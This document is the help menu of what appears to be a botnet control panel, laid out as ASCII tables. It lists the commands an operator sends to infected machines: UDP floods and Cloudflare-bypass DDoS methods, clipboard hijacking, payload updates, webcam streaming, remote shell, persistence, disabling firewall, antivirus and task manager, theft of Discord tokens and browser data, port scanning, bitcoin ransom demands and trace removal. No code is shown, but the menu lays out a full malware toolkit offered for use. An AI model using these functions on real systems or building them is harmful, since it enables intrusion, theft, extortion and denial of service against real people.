
                                                ╔═════════════════════╗
                                                ║       COMMAND       ║
          ╔═════════════════════════════════════╩═════════════════════╩════════════════════════════════════╗
          ║     attack udp <ip> <port> <time> <thread>     ║     attack udp 127.0.0.1 80 60 100            ║
          ║     ddos <method> <ip> <thread> <time>         ║     ddos cfb https://google.com 10 5          ║
          ║     nitrogen <amount>                          ║     nitrogen 100                              ║
          ║     infectclipboard <botName> <url>            ║     Admin privileges required                 ║
          ║     stopinfectclipboard <botName>              ║     Admin privileges required                 ║  
          ║     updatepayload <botName> <url>              ║     Admin privileges required                 ║
          ║     webcam <botName> <ip> <port>               ║     Stream webcam footage                     ║
          ║     kill <botName>                             ║     Stop client from listening                ║
          ║     shell <botName> <cmd>                      ║     Run shell commands                        ║
          ║     persistence <botName>                      ║     Set persistence                           ║
          ║     disablefirewall <botName>                  ║     Disable firewall                          ║
          ║     disableantivirus <botName>                 ║     Disable antivirus                         ║
          ║     disabletaskmanager <botName>               ║     Disable taskmanager                       ║
          ║     tokens <botName>                           ║     Grab all stored discord tokens            ║
          ║     selfdestruct <botName>                     ║     Remove all traces of the BotNet           ║
          ║     pscan <botName> <ip> <ps> <pe> <thread>    ║     pscan bot 127.0.0.1 1 100 100             ║
          ║     ransom <botName> <price> <email> <btc>     ║     ransom $100 mail@mail.com BTC             ║
          ╚════════════════════════════════════════════════════════════════════════════════════════════════╝
          
          
          ╔═══════════════════════════════════════════════════════╗
          ║     ping                ║     Ping all bots           ║
          ║     sysinfo             ║     Grab system info        ║
          ║     list                ║     List online bots        ║
          ║     clear               ║     Clear console           ║
          ║     update              ║     Update client list      ║
          ║     datagrabber         ║     Grab all browser info   ║
          ║     admincheck          ║     Check admin privileges  ║
          ║     exit or quit        ║     Exit server             ║
          ╚═══════════════════════════════════════════════════════╝
	  
	  
	  
	  
                                ╔═════════════════════╗
                                ║       METHODS       ║
          ╔═════════════════════╩═════════════════════╩════════════════════╗
          ║    cfb             ║   Bypass CF Attack                        ║
          ║    pxcfb           ║   Bypass CF Attack With Proxy             ║
          ║    cfreq           ║   Bypass CF UAM, CAPTCHA, BFM (request)   ║
          ║    cfsoc           ║   Bypass CF UAM, CAPTCHA, BFM (socket)    ║
          ╚════════════════════════════════════════════════════════════════╝
		
